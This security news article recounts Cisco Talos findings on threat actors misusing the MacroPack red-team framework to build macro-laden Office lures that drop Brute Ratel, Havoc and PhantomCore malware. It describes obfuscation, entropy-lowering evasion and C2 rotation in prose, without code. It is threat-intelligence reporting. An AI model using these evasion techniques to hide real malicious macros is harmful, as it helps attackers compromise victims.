Cisco Talos has recently uncovered a series of malicious Microsoft Office documents uploaded to VirusTotal between May and July 2024, originating from various sources, including China, Pakistan, Russia, and the U.S. These documents were generated using MacroPack, a payload generator framework typically intended for Red Team exercises. However, with moderate confidence, Talos assesses that threat actors are misusing this tool to deploy malicious payloads, including the Brute Ratel and Havoc post-exploitation frameworks and a new variant of the PhantomCore remote access trojan (RAT).
MacroPack: A Double-Edged Sword
MacroPack is designed to simplify the generation of various payloads, making it a favored tool among security professionals for Red Teaming activities. However, its ease of use and advanced obfuscation techniques make it equally appealing to threat actors. The framework can generate payloads packaged into Office-supported formats, scripting files, and shortcuts, making detection challenging due to the following features:
- Function and variable renaming
- Removal of surplus space characters and comments
- Strings encoding
- Payload obfuscation
While MacroPack offers a professional version with additional capabilities like anti-malware bypass, anti-reversing, and more advanced payloads, the free version is publicly accessible, raising concerns about its misuse for malicious purposes.
Common Characteristics and Non-Malicious Code
All analyzed documents exhibited similar characteristics, such as obfuscated VBA macros with varying degrees of complexity and diverse lure themes. The lure content ranged from generic prompts instructing users to enable macros to official-looking documents purportedly from military organizations. This variability points to multiple threat actors leveraging the same tool.
Interestingly, Talos noted the presence of four non-malicious VBA subroutines in all samples, which were not obfuscated and had no connection to other malicious code in the documents. Initially believed to be the hallmark of a single actor, further analysis revealed that these subroutines were likely added by the professional version of MacroPack, a theory confirmed through reliable sources.
MacroPack’s Obfuscation Techniques
MacroPack’s obfuscation methods include a payload string deobfuscation function and a random name generator based on Markov chains, which create seemingly meaningful function and variable names. This advanced obfuscation aims to evade detection by anti-malware engines that flag code with high entropy. By including non-malicious subroutines with low entropy, the overall entropy of the document is reduced, further lowering suspicion.
Clusters of Malicious Documents and Their Payloads
Despite similar Tactics, Techniques, and Procedures (TTPs) across various documents, Talos was unable to attribute the activity to a single threat group. Here’s a closer look at the distinct clusters identified:
Cluster 1: Chinese Lures
Uploaded from IP addresses in China, Taiwan, and Pakistan, these documents featured generic Word content prompting users to “enable content” to run VBA macros. The associated payloads included the Havoc demon—a post-exploitation C2 framework—and Brute Ratel implants. Notably, all C2 IP addresses linked to these payloads were located within the same autonomous system (AS4837) in Henan, China. This commonality suggests a single actor, although attribution remains inconclusive.
Cluster 2: Pakistani Military Lures
This cluster contained documents with themes related to the Pakistani military, uploaded from different locations in Pakistan. The lures included fake circulars announcing rewards for military personnel and employment confirmation letters for Pakistan Air Force Cyber Team members. Both documents deployed Brute Ratel badgers via DLL-based shellcode loaders, using DNS over HTTPS and Amazon Cloudfront CDN servers for C2 rotation. This setup indicates a sophisticated operation, possibly involving Red Team activities.
Cluster 3: Russian Lures
Unlike the previous clusters, the document from Russia was an Excel workbook with no visible content. The VBA code executed in two stages, with the second stage downloading a PhantomCore backdoor—a Golang-based RAT linked to Ukrainian hacktivist Head Mare, allegedly targeting Russian entities for cyber espionage. This variant used a unique execution method, launching a new Excel instance to inject the second stage, reminiscent of VBA virus techniques.
Cluster 4: U.S. Lures
Uploaded in March 2023, the final cluster involved a lure mimicking an encrypted NMLS renewal form. This document leveraged MacroPack’s Markov chain-based name generator to create plausible function and variable names, making the malicious code harder to detect. The payload delivery involved multiple VBA stages, with the final payload—likely an HTML application—attempting to download via a command line executed by mshta.exe. Talos has not retrieved the final payload, suggesting it might have been part of a Red Team exercise.
Conclusion
The misuse of MacroPack by threat actors highlights the blurred lines between tools intended for legitimate security testing and their potential for malicious exploitation. While the exact attribution of these activities remains elusive, the findings underscore the importance for defenders to be vigilant against such threats, which can emerge from benign-looking documents exploiting outdated Office configurations.
Organizations must ensure that all Microsoft Office installations are updated to the latest versions to mitigate the risk of macro-based attacks. Regular monitoring of network traffic for suspicious connections to known C2 infrastructures and adherence to best practices for handling suspicious documents can further enhance defenses against these sophisticated threats.
Follow us on 
(Twitter) for real time updates and exclusive content.
Interesting Article : EUCLEAK Vulnerability: A Threat to YubiKey and Other FIDO Devices
I truly appreciate your technique of writing a blog. I added it to my bookmark site list and will